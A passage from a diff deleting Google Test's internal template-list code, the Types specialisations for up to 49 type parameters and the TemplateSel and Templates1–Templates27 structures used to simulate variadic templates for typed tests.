-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, internal::None,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types42<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None, internal::None> {
-  typedef internal::Types43<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None, internal::None> {
-  typedef internal::Types44<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    internal::None, internal::None, internal::None, internal::None,
-    internal::None> {
-  typedef internal::Types45<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    T46, internal::None, internal::None, internal::None, internal::None> {
-  typedef internal::Types46<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    T46, T47, internal::None, internal::None, internal::None> {
-  typedef internal::Types47<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    T46, T47, T48, internal::None, internal::None> {
-  typedef internal::Types48<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47, T48> type;
-};
-template <typename T1, typename T2, typename T3, typename T4, typename T5,
-    typename T6, typename T7, typename T8, typename T9, typename T10,
-    typename T11, typename T12, typename T13, typename T14, typename T15,
-    typename T16, typename T17, typename T18, typename T19, typename T20,
-    typename T21, typename T22, typename T23, typename T24, typename T25,
-    typename T26, typename T27, typename T28, typename T29, typename T30,
-    typename T31, typename T32, typename T33, typename T34, typename T35,
-    typename T36, typename T37, typename T38, typename T39, typename T40,
-    typename T41, typename T42, typename T43, typename T44, typename T45,
-    typename T46, typename T47, typename T48, typename T49>
-struct Types<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14, T15,
-    T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28, T29, T30,
-    T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42, T43, T44, T45,
-    T46, T47, T48, T49, internal::None> {
-  typedef internal::Types49<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13, T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26,
-      T27, T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40,
-      T41, T42, T43, T44, T45, T46, T47, T48, T49> type;
-};
-
-namespace internal {
-
-# define GTEST_TEMPLATE_ template <typename T> class
-
-// The template "selector" struct TemplateSel<Tmpl> is used to
-// represent Tmpl, which must be a class template with one type
-// parameter, as a type.  TemplateSel<Tmpl>::Bind<T>::type is defined
-// as the type Tmpl<T>.  This allows us to actually instantiate the
-// template "selected" by TemplateSel<Tmpl>.
-//
-// This trick is necessary for simulating typedef for class templates,
-// which C++ doesn't support directly.
-template <GTEST_TEMPLATE_ Tmpl>
-struct TemplateSel {
-  template <typename T>
-  struct Bind {
-    typedef Tmpl<T> type;
-  };
-};
-
-# define GTEST_BIND_(TmplSel, T) \
-  TmplSel::template Bind<T>::type
-
-// A unique struct template used as the default value for the
-// arguments of class template Templates.  This allows us to simulate
-// variadic templates (e.g. Templates<int>, Templates<int, double>,
-// and etc), which C++ doesn't support directly.
-template <typename T>
-struct NoneT {};
-
-// The following family of struct and struct templates are used to
-// represent template lists.  In particular, TemplatesN<T1, T2, ...,
-// TN> represents a list of N templates (T1, T2, ..., and TN).  Except
-// for Templates0, every struct in the family has two member types:
-// Head for the selector of the first template in the list, and Tail
-// for the rest of the list.
-
-// The empty template list.
-struct Templates0 {};
-
-// Template lists of length 1, 2, 3, and so on.
-
-template <GTEST_TEMPLATE_ T1>
-struct Templates1 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates0 Tail;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2>
-struct Templates2 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates1<T2> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3>
-struct Templates3 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates2<T2, T3> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4>
-struct Templates4 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates3<T2, T3, T4> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5>
-struct Templates5 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates4<T2, T3, T4, T5> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6>
-struct Templates6 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates5<T2, T3, T4, T5, T6> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7>
-struct Templates7 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates6<T2, T3, T4, T5, T6, T7> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8>
-struct Templates8 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates7<T2, T3, T4, T5, T6, T7, T8> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9>
-struct Templates9 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates8<T2, T3, T4, T5, T6, T7, T8, T9> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10>
-struct Templates10 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates9<T2, T3, T4, T5, T6, T7, T8, T9, T10> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11>
-struct Templates11 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates10<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12>
-struct Templates12 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates11<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13>
-struct Templates13 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates12<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14>
-struct Templates14 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates13<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15>
-struct Templates15 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates14<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16>
-struct Templates16 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates15<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17>
-struct Templates17 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates16<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18>
-struct Templates18 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates17<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19>
-struct Templates19 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates18<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20>
-struct Templates20 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates19<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21>
-struct Templates21 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates20<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22>
-struct Templates22 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates21<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23>
-struct Templates23 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates22<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24>
-struct Templates24 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates23<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25>
-struct Templates25 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates24<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26>
-struct Templates26 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates25<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27>
-struct Templates27 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates26<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
